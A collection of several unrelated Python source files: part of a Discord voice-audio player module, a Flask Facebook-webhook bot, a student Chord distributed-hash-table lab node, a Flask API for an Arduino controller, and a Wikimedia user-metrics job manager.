(or avconv). As a callable, it must take two string arguments, ``source`` and
``executable``. Both parameters are the same values passed to this factory function.
``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
kwargs
The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
excluding ``bitrate`` and ``codec``.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
--------
:class:`FFmpegOpusAudio`
An instance of this class.
"""
executable = kwargs.get('executable')
codec, bitrate = await cls.probe(source, method=method, executable=executable)
return cls(source, bitrate=bitrate, codec=codec, **kwargs) # type: ignore
@classmethod
async def probe(
cls,
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
executable: Optional[str] = None,
) -> Tuple[Optional[str], Optional[int]]:
"""|coro|
Probes the input source for bitrate and codec information.
Parameters
------------
source
Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
method
Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
executable: :class:`str`
Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
---------
Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
A 2-tuple with the codec and bitrate of the input source.
"""
method = method or 'native'
executable = executable or 'ffmpeg'
probefunc = fallback = None
if isinstance(method, str):
probefunc = getattr(cls, '_probe_codec_' + method, None)
if probefunc is None:
raise AttributeError(f"Invalid probe method {method!r}")
if probefunc is cls._probe_codec_native:
fallback = cls._probe_codec_fallback
elif callable(method):
probefunc = method
fallback = cls._probe_codec_fallback
else:
raise TypeError("Expected str or callable for parameter 'probe', " \
f"not '{method.__class__.__name__}'")
codec = bitrate = None
loop = asyncio.get_event_loop()
try:
codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable)) # type: ignore
except Exception:
if not fallback:
_log.exception("Probe '%s' using '%s' failed", method, executable)
return # type: ignore
_log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
try:
codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable)) # type: ignore
except Exception:
_log.exception("Fallback probe using '%s' failed", executable)
else:
_log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
else:
_log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
finally:
return codec, bitrate
@staticmethod
def _probe_codec_native(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
exe = executable[:2] + 'probe' if executable in ('ffmpeg', 'avconv') else executable
args = [exe, '-v', 'quiet', '-print_format', 'json', '-show_streams', '-select_streams', 'a:0', source]
output = subprocess.check_output(args, timeout=20)
codec = bitrate = None
if output:
data = json.loads(output)
streamdata = data['streams'][0]
codec = streamdata.get('codec_name')
bitrate = int(streamdata.get('bit_rate', 0))
bitrate = max(round(bitrate/1000), 512)
return codec, bitrate
@staticmethod
def _probe_codec_fallback(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
args = [executable, '-hide_banner', '-i', source]
proc = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = proc.communicate(timeout=20)
output = out.decode('utf8')
codec = bitrate = None
codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
if codec_match:
codec = codec_match.group(1)
br_match = re.search(r"(\d+) [kK]b/s", output)
if br_match:
bitrate = max(int(br_match.group(1)), 512)
return codec, bitrate
def read(self) -> bytes:
return next(self._packet_iter, b'')
def is_opus(self) -> bool:
return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
"""Transforms a previous :class:`AudioSource` to have volume controls.
This does not work on audio sources that have :meth:`AudioSource.is_opus`
set to ``True``.
Parameters
------------
original: :class:`AudioSource`
The original AudioSource to transform.
volume: :class:`float`
The initial volume to set it to.
See :attr:`volume` for more info.
Raises
-------
TypeError
Not an audio source.
ClientException
The audio source is opus encoded.
"""
def __init__(self, original: AT, volume: float = 1.0):
if not isinstance(original, AudioSource):
raise TypeError(f'expected AudioSource not {original.__class__.__name__}.')
if original.is_opus():
raise ClientException('AudioSource must not be Opus encoded.')
self.original: AT = original
self.volume = volume
@property
def volume(self) -> float:
"""Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
return self._volume
@volume.setter
def volume(self, value: float) -> None:
self._volume = max(value, 0.0)
def cleanup(self) -> None:
self.original.cleanup()
def read(self) -> bytes:
ret = self.original.read()
return audioop.mul(ret, 2, min(self._volume, 2.0))
class AudioPlayer(threading.Thread):
DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
threading.Thread.__init__(self)
self.daemon: bool = True
self.source: AudioSource = source
self.client: VoiceClient = client
self.after: Optional[Callable[[Optional[Exception]], Any]] = after
self._end: threading.Event = threading.Event()
self._resumed: threading.Event = threading.Event()
self._resumed.set() # we are not paused
self._current_error: Optional[Exception] = None
self._connected: threading.Event = client._connected
self._lock: threading.Lock = threading.Lock()
if after is not None and not callable(after):
raise TypeError('Expected a callable for the "after" parameter.')
def _do_run(self) -> None:
self.loops = 0
self._start = time.perf_counter()
# getattr lookup speed ups
play_audio = self.client.send_audio_packet
self._speak(True)
while not self._end.is_set():
# are we paused?
if not self._resumed.is_set():
# wait until we aren't
self._resumed.wait()
continue
# are we disconnected from voice?
if not self._connected.is_set():
# wait until we are connected
self._connected.wait()
# reset our internal data
self.loops = 0
self._start = time.perf_counter()
self.loops += 1
data = self.source.read()
if not data:
self.stop()
break
play_audio(data, encode=not self.source.is_opus())
next_time = self._start + self.DELAY * self.loops
delay = max(0, self.DELAY + (next_time - time.perf_counter()))
time.sleep(delay)
def run(self) -> None:
try:
self._do_run()
except Exception as exc:
self._current_error = exc
self.stop()
finally:
self.source.cleanup()
self._call_after()
def _call_after(self) -> None:
error = self._current_error
if self.after is not None:
try:
self.after(error)
except Exception as exc:
_log.exception('Calling the after function failed.')
exc.__context__ = error
traceback.print_exception(type(exc), exc, exc.__traceback__)
elif error:
msg = f'Exception in voice thread {self.name}'
_log.exception(msg, exc_info=error)
print(msg, file=sys.stderr)
traceback.print_exception(type(error), error, error.__traceback__)
def stop(self) -> None:
self._end.set()
self._resumed.set()
self._speak(False)
def pause(self, *, update_speaking: bool = True) -> None:
self._resumed.clear()
if update_speaking:
self._speak(False)
def resume(self, *, update_speaking: bool = True) -> None:
self.loops = 0
self._start = time.perf_counter()
self._resumed.set()
if update_speaking:
self._speak(True)
def is_playing(self) -> bool:
return self._resumed.is_set() and not self._end.is_set()
def is_paused(self) -> bool:
return not self._end.is_set() and not self._resumed.is_set()
def _set_source(self, source: AudioSource) -> None:
with self._lock:
self.pause(update_speaking=False)
self.source = source
self.resume(update_speaking=False)
def _speak(self, speaking: bool) -> None:
try:
asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
except Exception as e:
_log.info("Speaking call in player failed: %s", e)
|
app.py | from flask import Flask, render_template, request, jsonify
from datetime import datetime
from pytz import timezone
from connector import facebook
import my_crypto
import atexit
import cf_deployment_tracker
import os
import json
import threading
# Emit Bluemix deployment event
cf_deployment_tracker.track()
app = Flask(__name__)
port = int(os.getenv('PORT', 8000))
my_crypto = my_crypto.MyCrypto()
@app.route('/', methods=['GET'])
def verify():
resp = facebook.verify(request)
if resp == None:
return "ok", 200
return resp
@app.route('/', methods=['POST'])
def hook():
resp = facebook.handle(request)
t = threading.Thread(target=handle, args=(resp,))
t.start()
return "ok", 200
def handle(resp):
my_crypto.handle(resp)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=port, debug=True)
|
chord_node.py | """
CPSC 5520, Seattle University
:Authors: Fariha Zainab
:Version: f19-02
:Assignment: Lab4 - DHT-CHORD
"""
"""
Start the chord_node by giving the port no. 0 to start the network
The node will print it's finger table, its address and predecessor.
When the next node joins the network, it can take the port no. from the address printed by previous nodes
"""
import sys
import socket
import csv
import hashlib
import pickle
import selectors
import threading
M_BITS = 5#160
NODES = 2**M_BITS
FIND_SUCCESSOR_REQUEST = "FIND_SUCCESSOR_REQUEST"
GET_PREDECESSOR_REQUEST = "GET_PREDECESSOR_REQUEST"
GET_SUCCESSOR_REQUEST = "GET_SUCCESSOR_REQUEST"
CLOSEST_PRECEDING_FINGER_REQUEST = "CLOSEST_PRECEDING_FINGER_REQUEST"
UPDATE_FINGER_TABLE_REQUEST = "UPDATE_FINGER_TABLE_REQUEST"
ADD_OR_UPDATE_ENTRY_REQUEST = "ADD_OR_UPDATE_ENTRY_REQUEST"
GET_ENTRY_REQUEST = 'GET_ENTRY_REQUEST'
LOCAL_ADD_OR_UPDATE_ENTRY_REQUEST = "LOCAL_ADD_OR_UPDATE_ENTRY_REQUEST"
LOCAL_GET_ENTRY_REQUEST = 'LOCAL_GET_ENTRY_REQUEST'
RPC_ARG_REQUEST_TYPE = 'RPC_ARG_REQUEST_TYPE'
RPC_ARG_NODE_INFO = 'RPC_ARG_NODE_INFO'
RPC_ARG_KEY = 'RPC_ARG_KEY'
RPC_ARG_VALUE = 'RPC_ARG_VALUE'
RPC_ARG_ID = 'RPC_ARG_ID'
RPC_ARG_INDEX = 'RPC_ARG_INDEX'
BUFFER_SIZE = 4096
BACKLOG = 100
class NodeInfo(object):
"""
class for storing node related information i.e. address and hash value
"""
def __init__(self, hashValue, address):
self.HashValue = hashValue
self.Address = address
class FingerTableEntry(object):
"""
Class for the finger table of the node
"""
def __init__(self):
self.Start = None
self.Interval = None
self.Node = NodeInfo(None, None)
class ChordNode(object):
"""
class for handling all the functionalities of the node
"""
def __init__(self):
self.fingerTable = {}
self.localData = {}
self.predecessor = None
self.nodeHashValue = None
self.selfNodeAddress = None
self.nodeInfo = None
self.listenSocket = None
self.initialNodeAddress = None
self.hasJoined = False
for i in range(1, M_BITS+1):
self.fingerTable[i] = FingerTableEntry()
def GetHashKey(self, key):
"""
Using SHA-1 for creating a hash value for the object
:param key: object we want to create hash value for
"""
data = pickle.dumps(key)
hashObject = hashlib.sha1(data)
hashValue = hashObject.hexdigest()
value = int(hashValue, 16)
return value
def CreateListenSocket(self):
"""
Create the server socket for the node
"""
self.listenSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listenSocket.bind(('localhost', 0))
self.listenSocket.listen(BACKLOG)
self.listenSocket.setblocking(False)
return self.listenSocket
def WaitForRequest(self):
"""
Creating thread for each request
"""
selector = selectors.DefaultSelector()
selector.register(self.listenSocket, selectors.EVENT_READ)
while True:
events = selector.select(timeout = 10)
for __, __ in events:
self.listenSocket.setblocking(True)
sock, address = self.listenSocket.accept()
self.listenSocket.setblocking(False)
bgThread = threading.Thread(target=self.HandleRemoteCall, args=(sock, address))
bgThread.start()
def HandleRemoteCall(self, sock, address):
"""
Handle the RPC calls coming from different nodes
"""
sock.setblocking(True)
rpcArgs = pickle.loads(sock.recv(BUFFER_SIZE))
print(f"Received RPC for {rpcArgs[RPC_ARG_REQUEST_TYPE]} to {address}")
value = {}
if(rpcArgs[RPC_ARG_REQUEST_TYPE] == FIND_SUCCESSOR_REQUEST):
value = self.FindSuccessor(rpcArgs[RPC_ARG_ID])
elif (rpcArgs[RPC_ARG_REQUEST_TYPE] == GET_PREDECESSOR_REQUEST):
remoteNodePredecessor = self.predecessor
self.predecessor = rpcArgs[RPC_ARG_NODE_INFO]
value = remoteNodePredecessor
elif rpcArgs[RPC_ARG_REQUEST_TYPE] == GET_SUCCESSOR_REQUEST:
value = self.fingerTable[1].Node
elif rpcArgs[RPC_ARG_REQUEST_TYPE] == CLOSEST_PRECEDING_FINGER_REQUEST:
value = self.ClosestPrecedingFinger(rpcArgs[RPC_ARG_ID])
elif rpcArgs[RPC_ARG_REQUEST_TYPE] == UPDATE_FINGER_TABLE_REQUEST:
self.UpdateFingerTable(rpcArgs[RPC_ARG_INDEX], rpcArgs[RPC_ARG_NODE_INFO])
elif rpcArgs[RPC_ARG_REQUEST_TYPE] == ADD_OR_UPDATE_ENTRY_REQUEST:
self.AddOrUpdateEntry(rpcArgs[RPC_ARG_KEY], rpcArgs[RPC_ARG_VALUE])
elif rpcArgs[RPC_ARG_REQUEST_TYPE] == GET_ENTRY_REQUEST:
value = self.GetEntry(rpcArgs[RPC_ARG_KEY])
elif rpcArgs[RPC_ARG_REQUEST_TYPE] == LOCAL_ADD_OR_UPDATE_ENTRY_REQUEST:
self.LocalAddOrUpdateEntry(rpcArgs[RPC_ARG_KEY], rpcArgs[RPC_ARG_VALUE])
elif rpcArgs[RPC_ARG_REQUEST_TYPE] == LOCAL_GET_ENTRY_REQUEST:
value = self.LocalGetEntry(rpcArgs[RPC_ARG_KEY])
sock.sendall(pickle.dumps(value))
self.ShutDownSocket(sock)
def CreateAClientSocket(self, address):
"""
creating the client socket of the node to send request
:param address: address of the node on which request is to be sent
"""
requestSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
requestSocket.setblocking(True)
requestSocket.connect(address)
return requestSocket
def RemoteCall(self, address, argDict):
"""
Making the RPC call to the nodes
:param address: address of the node on which the node will make an RPC
:param argDict: dictionary contaiining all the data to be sent for processing on the node
"""
print(f"Making RPC for {argDict[RPC_ARG_REQUEST_TYPE]} to {address}")
requestSocket = self.CreateAClientSocket(address)
requestByteArray = pickle.dumps(argDict)
requestSocket.sendall(requestByteArray)
requestSocket.shutdown(socket.SHUT_WR)
value = pickle.loads(requestSocket.recv(BUFFER_SIZE))
requestSocket.shutdown(socket.SHUT_RD)
requestSocket.close()
return value
def ShutDownSocket(self, s):
"""
Utility function to shut down the socket
"""
try:
s.shutdown(socket.SHUT_RDWR)
s.close()
except socket.error:
pass
def GetEntry(self, key):
"""
Handle the query for the key
:param key: key value queried by the user
"""
keyId = self.GetHashKey(key)
succNode = self.FindSuccessor(keyId)
return self.RemoteGetEntry(succNode.Address, key)
def AddOrUpdateEntry(self, key, value):
"""
Handle the add or update of the key and values in the chord network
"""
keyId = self.GetHashKey(key)
succNode = self.FindSuccessor(keyId)
self.RemoteAddOrUpdateEntry(succNode.Address, key, value)
def LocalAddOrUpdateEntry(self, key, value):
"""
add or update the keys and values in the node locally
"""
self.localData[key] = value
def LocalGetEntry(self, key):
"""
local method to get the value for the key queried by the user
"""
if key in self.localData:
return self.localData[key]
return None
def RemoteAddOrUpdateEntry(self, destAddress, key, value):
"""
Handle the remote call for adding and updating the entry in the chord network
:param destAddress: address of the node to make an RPC call
:param key: key to be added
:param value: value related to that key
"""
if(destAddress == self.selfNodeAddress):
self.LocalAddOrUpdateEntry(key, value)
argDict = {}
argDict[RPC_ARG_REQUEST_TYPE] = LOCAL_ADD_OR_UPDATE_ENTRY_REQUEST
argDict[RPC_ARG_KEY] = key
argDict[RPC_ARG_VALUE] = value
self.RemoteCall(destAddress, argDict)
def RemoteGetEntry(self, destAddress, key):
"""
Handles remote call to get the value of entry queried by the user
:param destAddress: address of the node to make an RPC call
:param key: key to be queried
"""
if(destAddress == self.selfNodeAddress):
return self.LocalGetEntry(key)
argDict = {}
argDict[RPC_ARG_REQUEST_TYPE] = LOCAL_GET_ENTRY_REQUEST
argDict[RPC_ARG_KEY] = key
return self.RemoteCall(destAddress, argDict)
def RemoteFindSuccessor(self, destAddress, id):
"""
Handles the remote call to find the successor of the node
:param destAddress: address of the remote note
:param id: id of the node, we want to know the successor node for
"""
if(destAddress == self.selfNodeAddress):
value = self.FindSuccessor(id)
return value
argDict = {}
argDict[RPC_ARG_REQUEST_TYPE] = FIND_SUCCESSOR_REQUEST
argDict[RPC_ARG_ID] = id
successor = self.RemoteCall(destAddress, argDict)
return successor
def RemoteGetAndSetPredecessor(self, destAddress, node):
"""
Handles remote call to get and set the predecessor for the node
:param destAddress: address of the remote note
:param node: node details we want to know the predecessor of
"""
if(destAddress == self.selfNodeAddress):
return self.predecessor
argDict = {}
argDict[RPC_ARG_REQUEST_TYPE] = GET_PREDECESSOR_REQUEST
argDict[RPC_ARG_NODE_INFO] = node
predecessor = self.RemoteCall(destAddress, argDict)
return predecessor
def RemoteGetSuccessor(self, destAddress):
"""
Handles remote call to get the successor of the given node
:param destAddress: address of the remote note
"""
if (destAddress == self.selfNodeAddress):
return self.fingerTable[1].Node
argDict = {}
argDict[RPC_ARG_REQUEST_TYPE] = GET_SUCCESSOR_REQUEST
successor = self.RemoteCall(destAddress, argDict)
return successor
def RemoteClosestPrecedingFinger(self, destAddress, id):
"""
Handles remote call to find the closest preceding node for the given node
:param destAddress: address of the remote note
:param id: id of the node we want the closest preceding finger for
"""
if(destAddress == self.selfNodeAddress):
value = self.ClosestPrecedingFinger(id)
return value
argDict = {}
argDict[RPC_ARG_ID] = id
argDict[RPC_ARG_REQUEST_TYPE] = CLOSEST_PRECEDING_FINGER_REQUEST
precedingFinger = self.RemoteCall(destAddress, argDict)
return precedingFinger
def RemoteUpdateFingerTable(self, destAddress, fingerTableIndex, node):
"""
Handles remote call to update the finger table of all the nodes that have the entry for the given node
:param destAddress: address of the remote note
:param fingerTableIndex: row number of teh finger table
:param node: the details of the given node
"""
if(destAddress == self.selfNodeAddress):
self.UpdateFingerTable(fingerTableIndex, node)
argDict = {}
argDict[RPC_ARG_REQUEST_TYPE] = UPDATE_FINGER_TABLE_REQUEST
argDict[RPC_ARG_INDEX] = fingerTableIndex
argDict[RPC_ARG_NODE_INFO] = node
self.RemoteCall(destAddress, argDict)
def InitFingerTable(self, initialNodeAddress):
"""
Method to intialise the finger table for a given node when it joins the chord network
:param initialNodeAddress: the address of the chord node used by this node to join the network
"""
self.fingerTable[1].Node = self.RemoteFindSuccessor(initialNodeAddress, self.fingerTable[1].Start)
self.predecessor = self.RemoteGetAndSetPredecessor(self.fingerTable[1].Node.Address, self.nodeInfo)
for i in range(1, M_BITS):
if self.IsInRange(self.fingerTable[i+1].Start, self.nodeInfo.HashValue, True, self.fingerTable[i].Node.HashValue, False):
self.fingerTable[i+1].Node = self.fingerTable[i].Node
else:
node = self.RemoteFindSuccessor(initialNodeAddress, self.fingerTable[i+1].Start)
self.fingerTable[i+1].Node = node
def CreateFingerTable(self):
"""
Create the finger table for the node
"""
for i in range(1, M_BITS+1):
self.fingerTable[i].Start = ((self.nodeHashValue + (2**(i-1))) % NODES)
for i in range(1, M_BITS+1):
if(i < M_BITS):
self.fingerTable[i].Interval = range(self.fingerTable[i].Start, self.fingerTable[i+1].Start)
else:
lastIntervalEntry = (self.nodeHashValue + 2**M_BITS)% 2**M_BITS
self.fingerTable[i].Interval = range(self.fingerTable[i].Start, lastIntervalEntry)
def FindSuccessor(self, id):
"""
Local method to find the successor of the node
:param id: id of the node we want the successor of
"""
node = self.FindPredeccesor(id)
return self.RemoteGetSuccessor(node.Address)
def FindPredeccesor(self, id):
"""
Local method to find the predecessor of the node
:param id: id of the node we want the predecessor of
"""
node = self.nodeInfo
while True:
succNode = self.RemoteGetSuccessor(node.Address)
if self.IsInRange(id, node.HashValue, False,succNode.HashValue, True) == False:
node = self.RemoteClosestPrecedingFinger(node.Address, id)
else:
break
return node
def ClosestPrecedingFinger(self, id):
"""
Local method to find the closest preceding finger of the node
:param id: id of the node we want the closest preceding finger for
"""
for i in range(M_BITS, 0, -1):
if self.IsInRange(self.fingerTable[i].Node.HashValue, self.nodeInfo.HashValue, False, id, False):
return self.fingerTable[i].Node
return self.nodeInfo
def UpdateOthers(self):
"""
Local method to update the finger table entries
"""
for i in range(1, M_BITS+1):
predNode = self.FindPredeccesor((1 + self.nodeHashValue - 2**(i-1) + NODES) % NODES)
self.RemoteUpdateFingerTable(predNode.Address, i, self.nodeInfo)
def UpdateFingerTable(self, i, s):
"""
local call to update finger table entries
"""
""" if s is i-th finger of n, update this node's finger table with s """
ftEntry = self.fingerTable[i]
# FIXME: don't want e.g. [1, 1) which is the whole circle
# FIXME: bug in paper, [.start
if (ftEntry.Start != ftEntry.Node.HashValue and self.IsInRange(s.HashValue, ftEntry.Start, True, ftEntry.Node.HashValue, False)):
self.fingerTable[i].Node = s
self.PrintFingerTable()
self.RemoteUpdateFingerTable(self.predecessor.Address, i, s)
def NodeJoin(self, host, port):
"""
Method to join the node in the chord network
"""
self.selfNodeAddress = self.listenSocket.getsockname()
self.nodeHashValue = self.GetHashKey(self.selfNodeAddress)
self.nodeInfo = NodeInfo(self.nodeHashValue, self.selfNodeAddress)
self.initialNodeAddress = (host, port)
self.CreateFingerTable()
if(port == 0):
for i in range(1, M_BITS+1):
self.fingerTable[i].Node = self.nodeInfo
self.predecessor = self.nodeInfo
else:
self.InitFingerTable(self.initialNodeAddress)
self.UpdateOthers()
self.hasJoined = True
self.PrintFingerTable()
print("Node Address is {}".format(self.selfNodeAddress))
print("Node joined successfully.")
def PrintFingerTable(self):
"""
Method to print the finger table of the node
"""
if self.hasJoined == False:
return
print("")
print("---------------------------------------------")
for __, v in self.fingerTable.items():
print(f"Start={v.Start}, Interval={v.Interval}, Node=({v.Node.HashValue}, {v.Node.Address})")
print("---------------------------------------------")
print(f"Predecessor=({self.predecessor.HashValue}, {self.predecessor.Address})")
def IsInRange(self, id, start, isStartInclusive, end, isEndInclusive):
"""
Utility method to manage the range
"""
if isStartInclusive == False:
start = (start + 1) % NODES
if isEndInclusive == True:
end = (end + 1) % NODES
allRanges = []
if(start < end):
allRanges.append(range(start, end))
else:
allRanges.append(range(start, NODES))
allRanges.append(range(0, end))
for r in allRanges:
if id in r:
return True
return False
if __name__ == "__main__":
#if len(sys.argv) != 2:
# print("Please enter the port number")
# exit(1)
host = 'localhost'
port = 0#int(sys.argv[1])
node = ChordNode()
node.CreateListenSocket()
bgThread = threading.Thread(target=node.NodeJoin, args=(host, port))
bgThread.start()
node.WaitForRequest()
|
api_server.py | # ------------------------------------------------------------------------------
# name : api_server.js
# author : Noe Flatreaud (Retr0)
# description:
# simple API server for the IHC-controller project
# it provide an API url as well as a basic dashboard so you can
# use it every were by using the web browser.
# you can as well create a third-pary app and use the api url.
# ------------------------------------------------------------------------------
import serial
import threading
import time
from flask import *
app = Flask(__name__)
# ------------------------------------------------------------------------------
# Arduino Serial
# ------------------------------------------------------------------------------
arduino = serial.Serial(port='COM4', baudrate=9600, timeout=.1)
#def write_read(x):
# arduino.write(bytes(x, 'utf-8'))
# time.sleep(0.05)
# data = arduino.readline()
# return data
# ------------------------------------------------------------------------------
# Routes
# ------------------------------------------------------------------------------
# default route
@app.route('/')
def index():
return render_template('index.html')
# API route
@app.route('/api', methods=['GET'])
def api():
try:
output = int(request.args['output']);
value = int(request.args['value']);
print(bytes([output, value]))
except Exception as e:
data = "Oops Something went wrong !!<br> {0}".format(str(e))
return data, 413 # HTTP_413_REQUEST_ENTITY_TOO_LARGE
else:
data = "OK"
arduino.write(bytes([output, value]));
return data, 200 # HTTP_200_OK
# allow javascript index.js to be imported !
@app.route('/index.js')
def js():
return render_template('index.js')
def io_thread():
print("Started new Daemon")
while 1:
time.sleep(1)
#print("slept");
# ------------------------------------------------------------------------------
# Main
# ------------------------------------------------------------------------------
if __name__ == "__main__":
io = threading.Thread(target = io_thread, daemon = True)
io.start();
# run flask server
app.run(host='0.0.0.0')
|
request_manager.py | """
This module implements the request manager functionality.
Job Queue and Processing
^^^^^^^^^^^^^^^^^^^^^^^^
As requests are issued via http to the API a process queue will store all
active jobs. Processes will be created and assume one of the following
states throughout their existence: ::
* 'pending' - The request has yet to be begin being processed
* 'running' - The request is being processed
* 'success' - The request has finished processing and is exposed at
the url
* 'failure' - The result has finished processing but dailed to expose
results
When a process a request is received and a job is created to service that
request it enters the 'pending' state. If the job returns without
exception it enters the 'success' state, otherwise it enters the 'failure'
state. The job remains in either of these states until it is cleared
from the process queue.
Response Data
^^^^^^^^^^^^^
As requests are made to the API the data generated and formatted as JSON.
The definition of is as follows: ::
{ header : header_list,
cohort_expr : cohort_gen_timestamp : metric : timeseries :
aggregator : start : end : [ metric_param : ]* : data
}
Where each component is defined: ::
header_str := list(str), list of header values
cohort_expr := str, cohort ID expression
cohort_gen_timestamp := str, cohort generation timestamp (earliest of
all cohorts in expression)
metric := str, user metric handle
timeseries := boolean, indicates if this is a timeseries
aggregator := str, aggregator used
start := str, start datetime of request
end := str, end datetime of request
metric_param := -, optional metric parameters
data := list(tuple), set of data points
Request data is mapped to a query via metric objects and hashed in the
dictionary `api_data`.
Request Flow Management
^^^^^^^^^^^^^^^^^^^^^^^
This portion of the module defines a set of methods useful in handling
series of metrics objects to build more complex results. This generally
involves creating one or more UserMetric derived objects with passed
parameters to service a request. The primary entry point is the
``process_data_request`` method. This method coordinates requests for
three different top-level request types:
- **Raw requests**. Output is a set of datapoints that consist of the
user IDs accompanied by metric results.
- **Aggregate requests**. Output is an aggregate of all user results based
on the type of aggregaion as defined in the aggregator module.
- **Time series requests**. Outputs a time series list of data. For this
type of request a start and end time must be defined along with an
interval length. Further an aggregator must be provided which operates
on each time interval.
Also defined are metric types for which requests may be made with
``metric_dict``, and the types of aggregators that may be called on metrics
``aggregator_dict``, and also the meta data around how many threads may be
used to process metrics ``USER_THREADS`` and ``REVISION_THREADS``.
"""
__author__ = {
"ryan faulkner": "rfaulkner@wikimedia.org"
}
__date__ = "2013-03-05"
__license__ = "GPL (version 2 or later)"
from user_metrics.config import logging, settings
from user_metrics.api import MetricsAPIError, error_codes, query_mod
from user_metrics.api.engine.data import get_users
from user_metrics.api.engine.request_meta import rebuild_unpacked_request
from user_metrics.metrics.users import MediaWikiUser
from user_metrics.metrics.user_metric import UserMetricError
from user_metrics.utils import unpack_fields
from multiprocessing import Process, Queue
from collections import namedtuple
from os import getpid
from sys import getsizeof
from Queue import Empty
from time import sleep
# API JOB HANDLER
# ###############
# API queues for API service requests and responses
api_request_queue = Queue()
api_response_queue = Queue()
# MODULE CONSTANTS
#
# 1. Determines maximum block size of queue item
# 2. Number of maximum concurrently running jobs
# 3. Time to block on waiting for a new request to appear in the queue
MAX_BLOCK_SIZE = 5000
MAX_CONCURRENT_JOBS = 1
QUEUE_WAIT = 5
# Defines the job item type used to temporarily store job progress
job_item_type = namedtuple('JobItem', 'id process request queue')
def job_control(request_queue, response_queue):
"""
Controls the execution of user metrics requests
Parameters
~~~~~~~~~~
request_queue : multiprocessing.Queue
Queues incoming API requests.
"""
# Store executed and pending jobs respectively
job_queue = list()
wait_queue = list()
# Global job ID number
job_id = 0
# Tallies the number of concurrently running jobs
concurrent_jobs = 0
log_name = '{0} :: {1}'.format(__name__, job_control.__name__)
logging.debug('{0} - STARTING...'.format(log_name))
while 1:
# Request Queue Processing
# ------------------------
try:
# Pull an item off of the queue
req_item = request_queue.get(timeout=QUEUE_WAIT)
logging.debug(log_name + ' :: PULLING item from request queue -> ' \
'\n\tCOHORT = {0} - METRIC = {1}'
.format(req_item['cohort_expr'], req_item['metric']))
except Exception as e:
req_item = None
#logging.debug('{0} :: {1} - Listening ...'
#.format(__name__, job_control.__name__))
# Process complete jobs
# ---------------------
for job_item in job_queue:
# Look for completed jobs
if not job_item.queue.empty():
# Put request creds on res queue -- this goes to
# response_handler asynchronously
response_queue.put(unpack_fields(job_item.request),
block=True)
# Pull data off of the queue and add it to response queue
while not job_item.queue.empty():
data = job_item.queue.get(True)
if data:
response_queue.put(data, block=True)
del job_queue[job_queue.index(job_item)]
concurrent_jobs -= 1
logging.debug(log_name + ' :: RUN -> RESPONSE - Job ID {0}' \
'\n\tConcurrent jobs = {1}'
.format(str(job_item.id), concurrent_jobs))
# Process pending jobs
# --------------------
for wait_req in wait_queue:
if concurrent_jobs <= MAX_CONCURRENT_JOBS:
# prepare job from item
req_q = Queue()
proc = Process(target=process_metrics, args=(req_q, wait_req))
proc.start()
job_item = job_item_type(job_id, proc, wait_req, req_q)
job_queue.append(job_item)
del wait_queue[wait_queue.index(wait_req)]
concurrent_jobs += 1
job_id += 1
logging.debug(log_name + ' :: WAIT -> RUN - Job ID {0}' \
'\n\tConcurrent jobs = {1}, ' \
'COHORT = {2} - METRIC = {3}'\
.format(str(job_id), concurrent_jobs,
wait_req.cohort_expr, wait_req.metric))
# Add newest job to the queue
# ---------------------------
if req_item and concurrent_jobs <= MAX_CONCURRENT_JOBS:
# Build the request item
rm = rebuild_unpacked_request(req_item)
logging.debug(log_name + ' : REQUEST -> WAIT ' \
'\n\tCOHORT = {0} - METRIC = {1}'
.format(rm.cohort_expr, rm.metric))
wait_queue.append(rm)
logging.debug('{0} - FINISHING.'.format(log_name))
def process_metrics(p, request_meta):
"""
Worker process for requests, forked from the job controller. This
method handles:
* Filtering cohort type: "regular" cohort, single user, user group
* Secondary validation
*
"""
log_name = '{0} :: {1}'.format(__name__, process_metrics.__name__)
logging.info(log_name + ' - START JOB'
'\n\tCOHORT = {0} - METRIC = {1}'
' - PID = {2})'.
format(request_meta.cohort_expr, request_meta.metric, getpid()))
err_msg = __name__ + ' :: Request failed.'
users = list()
# obtain user list - handle the case where a lone user ID is passed
# !! The username should already be validated
if request_meta.is_user:
uid = MediaWikiUser.is_user_name(request_meta.cohort_expr,
request_meta.project)
if uid:
valid = True
users = [uid]
else:
valid = False
err_msg = error_codes[3]
# The "all" user group. All users within a time period.
elif request_meta.cohort_expr == 'all':
users = MediaWikiUser(query_type=1)
try:
users = [u for u in users.get_users(
request_meta.start, request_meta.end,
project=request_meta.project)]
valid = True
except Exception:
valid = False
err_msg = error_codes[5]
# "TYPICAL" COHORT PROCESSING
else:
users = get_users(request_meta.cohort_expr)
# Default project is what is stored in usertags_meta
project = query_mod.get_cohort_project_by_meta(
request_meta.cohort_expr)
request_meta.project = project
logging.debug(__name__ + ' :: Using default project from ' \
'usertags_meta {0}.'.format(project))
valid = True
